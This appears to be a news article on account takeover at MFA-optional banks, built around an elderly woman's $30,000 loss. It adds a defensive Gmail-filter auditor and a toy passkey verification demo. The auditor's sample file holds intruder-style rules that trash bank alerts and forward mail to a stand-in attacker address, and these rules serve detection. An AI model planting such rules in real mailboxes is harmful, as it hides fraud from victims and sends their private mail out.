MFA-Optional Banks Leave Customer Accounts Vulnerable to Theft
A personal account of a significant financial loss underscores the risks associated with financial institutions and major tech companies not mandating multi-factor authentication (MFA).

A recent personal tragedy has brought into sharp focus the critical security gap left by financial institutions and major tech providers that do not enforce multi-factor authentication (MFA) on customer accounts. The author recounts how their 84-year-old mother lost $30,000 from her bank accounts after attackers compromised her Gmail and financial accounts, likely by exploiting reused credentials from a past data breach.
The incident, which occurred in May, saw thieves systematically drain funds from the mother's checking and savings accounts. Their sophistication was evident in their ability to create spam filters within her Gmail account to intercept any alerts from her bank or retirement savings provider, preventing her from being notified of the fraudulent transactions or the creation of new accounts in her name. This allowed the attackers to operate undetected for a period, highlighting a severe lapse in security that a mandatory MFA policy could have prevented.
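The alert-suppression trick described above leaves a durable artifact: the filter rules themselves. The following script is an added example, not code from the article or from Google, that audits a Gmail filter export (Settings > Filters > Export produces an Atom feed of `apps:property` name/value pairs; the sample below is constructed in that shape) and flags rules that trash, archive or mark-as-read mail matching financial keywords, or that forward mail elsewhere. The keyword list and the sender domains are assumptions chosen for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a Gmail "Export filters" file (mailFilters.xml).
# Entry 1 is a benign newsletter rule; entries 2 and 3 are the kind of rules an
# intruder adds to hide bank alerts and siphon off mail from a retirement provider.
SAMPLE_FILTER_EXPORT = """<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <entry>
    <category term='filter'/>
    <apps:property name='from' value='newsletter@example.org'/>
    <apps:property name='label' value='Newsletters'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <category term='filter'/>
    <apps:property name='hasTheWord' value='bank OR "new account" OR transfer OR alert'/>
    <apps:property name='shouldTrash' value='true'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
  </entry>
  <entry>
    <category term='filter'/>
    <apps:property name='from' value='@retirementprovider.example'/>
    <apps:property name='forwardTo' value='collector@attacker.example'/>
  </entry>
</feed>
"""

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Match criteria a filter can carry, and the actions that keep mail out of sight.
CRITERIA_KEYS = ("from", "to", "subject", "hasTheWord", "doesNotHaveTheWord")
HIDING_ACTIONS = ("shouldTrash", "shouldArchive", "shouldMarkAsRead")
# Assumed keyword list; tune it to the institutions the mailbox owner actually uses.
FINANCIAL_TERMS = re.compile(
    r"bank|account|transfer|payment|alert|statement|retire|verif|wire|fraud", re.I)


def parse_filters(xml_text):
    """Return one dict of property name -> value per filter entry."""
    root = ET.fromstring(xml_text)
    return [{p.get("name"): p.get("value") for p in entry.findall(f"{APPS}property")}
            for entry in root.findall(f"{ATOM}entry")]


def audit_filter(props):
    """Return a finding dict for a suspicious filter, or None for a benign one."""
    criteria = {k: props[k] for k in CRITERIA_KEYS if k in props}
    criteria_text = " ".join(criteria.values())
    actions = [a for a in HIDING_ACTIONS if props.get(a, "").lower() == "true"]
    reasons = []
    if "forwardTo" in props:
        reasons.append(f"forwards matching mail to {props['forwardTo']}")
    if actions and FINANCIAL_TERMS.search(criteria_text):
        reasons.append(f"hides financial-looking mail via {', '.join(actions)}")
    if not reasons:
        return None
    return {"criteria": criteria, "actions": actions, "reasons": reasons}


def audit_filters(xml_text):
    """Audit every filter in an export and return the list of findings."""
    return [f for f in (audit_filter(p) for p in parse_filters(xml_text)) if f]


if __name__ == "__main__":
    for finding in audit_filters(SAMPLE_FILTER_EXPORT):
        print(finding["criteria"], "->", "; ".join(finding["reasons"]))
```

Run it against a real export by reading the file into `audit_filters`; the same check belongs in any "is this mailbox compromised?" playbook, because a filter that silently trashes bank mail is rarely something the account owner created.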
While the exact method of initial compromise remains unconfirmed, the author points to the reuse of passwords across multiple accounts, including one known to have been part of a previous data breach, as the probable vector. This common vulnerability, when combined with the absence of MFA on critical accounts like Gmail and her banking services, provided a clear path for cybercriminals to gain unauthorized access and execute their theft.
Gregory Shein, CEO of Nomadic Soft, a SaaS company serving fintech clients, noted that many consumers mistakenly believe MFA is universally required by banks. He explained that some institutions still offer MFA as an optional feature, balancing security concerns against potential user friction, such as reduced conversion rates, increased support tickets, and frustration for less tech-savvy customers.
Major financial institutions like Bank of America, Chase, Capital One, and Citibank, along with Google, still offer MFA as an optional setting. This contrasts with institutions like PNC, which mandate it. The author's mother was fortunate that one of her financial institutions flagged a suspicious transaction, leading to the protection of that specific account. However, the damage to her other accounts had already been done.
After a lengthy and arduous process of reporting the theft, involving unhelpful initial responses from the bank's fraud department, the stolen funds were eventually restored. This outcome, however, is not guaranteed for all victims. In the U.S., consumers have a limited window to dispute transactions, and banks have discretion in determining the legitimacy of claims, potentially leaving victims without recourse.
The incident serves as a stark reminder that while user error, such as password reuse, plays a role, the responsibility also lies with service providers to implement robust security measures. Just as banks require PINs for ATM cards, the author argues that mandatory MFA should be a baseline security requirement for all financial and sensitive online accounts.
Andrew Shikiar, CEO of the FIDO Alliance, acknowledged the industry's concern about user friction, which has slowed the widespread adoption of stronger authentication. However, he emphasized the significant security benefits, with Microsoft data suggesting MFA can prevent up to 99.9% of account attacks. While acknowledging that MFA methods like SMS-based one-time passcodes can be vulnerable, the article points to passkeys as a more secure, phishing-resistant alternative that combines device-based security with cryptographic key pairs.
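To make the phishing-resistance claim concrete, here is an added example (not from the article or the FIDO Alliance) modelling the two checks that make a passkey login fail on a look-alike site: the browser only releases a credential when the requested relying-party id matches the page's origin, and the relying party only accepts an assertion whose signed client data names its own origin and challenge. The relying-party id, origins and user name are assumptions, and because the example is dependency-free the asymmetric signature is replaced by an HMAC over a per-credential secret; a real passkey signs with a private key that never leaves the authenticator and the server holds only the public key.

```python
import hashlib
import hmac
import json
import secrets

RP_ID = "bank.example"                        # assumed relying-party id
EXPECTED_ORIGIN = "https://bank.example"      # assumed genuine login origin
PHISHING_ORIGIN = "https://bank-example.com"  # constructed look-alike origin


class ToyAuthenticator:
    """Stand-in authenticator: one credential per rpId, HMAC instead of a key pair."""

    def __init__(self):
        self._creds = {}

    def register(self, rp_id):
        cred_id, secret = secrets.token_hex(8), secrets.token_bytes(32)
        self._creds[rp_id] = (cred_id, secret)
        return cred_id, secret  # the secret plays the role of the registered public key

    def get_assertion(self, rp_id, challenge, page_origin):
        cred_id, secret = self._creds[rp_id]
        # The browser, not the page, writes clientDataJSON, so the origin is the real one.
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                                  "origin": page_origin}, sort_keys=True).encode()
        auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x05"  # rpIdHash + UP|UV flags
        to_sign = auth_data + hashlib.sha256(client_data).digest()
        return cred_id, client_data, auth_data, hmac.new(secret, to_sign, hashlib.sha256).digest()


def browser_get_assertion(authenticator, page_origin, rp_id, challenge):
    """Browser-side scoping: rpId must equal, or be a registrable suffix of, the page host."""
    host = page_origin.split("://", 1)[1].split("/", 1)[0]
    if host != rp_id and not host.endswith("." + rp_id):
        raise PermissionError(f"rpId {rp_id!r} is not valid for origin {page_origin!r}")
    return authenticator.get_assertion(rp_id, challenge, page_origin)


class RelyingParty:
    def __init__(self):
        self.registered = {}  # cred_id -> verification secret (public key in reality)
        self.pending = {}     # user -> outstanding challenge

    def new_challenge(self, user):
        self.pending[user] = secrets.token_urlsafe(32)
        return self.pending[user]

    def verify(self, user, cred_id, client_data, auth_data, sig):
        expected = self.pending.pop(user, None)
        secret = self.registered.get(cred_id)
        if expected is None or secret is None:
            return False
        cd = json.loads(client_data)
        if cd.get("type") != "webauthn.get" or cd.get("challenge") != expected:
            return False
        if cd.get("origin") != EXPECTED_ORIGIN:          # the phishing-resistance check
            return False
        if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest() or not auth_data[32] & 0x01:
            return False
        want = hmac.new(secret, auth_data + hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
        return hmac.compare_digest(sig, want)


def run_scenarios():
    """Return (genuine login ok, phishing page blocked by browser, relayed assertion rejected)."""
    auth, rp = ToyAuthenticator(), RelyingParty()
    cred_id, secret = auth.register(RP_ID)
    rp.registered[cred_id] = secret

    genuine = rp.verify("alice", *browser_get_assertion(
        auth, EXPECTED_ORIGIN, RP_ID, rp.new_challenge("alice")))

    challenge = rp.new_challenge("alice")  # challenge a phishing page relays from the real site
    try:
        browser_get_assertion(auth, PHISHING_ORIGIN, RP_ID, challenge)
        blocked = False
    except PermissionError:
        blocked = True

    # Even if the browser check were somehow bypassed, the signed origin gives the relay away.
    relayed_ok = rp.verify("alice", *auth.get_assertion(RP_ID, challenge, PHISHING_ORIGIN))
    return genuine, blocked, relayed_ok


if __name__ == "__main__":
    print(run_scenarios())
```

Contrast this with an SMS or app-generated one-time code, which carries no notion of origin: whatever site the user types it into can relay it to the real bank within its validity window.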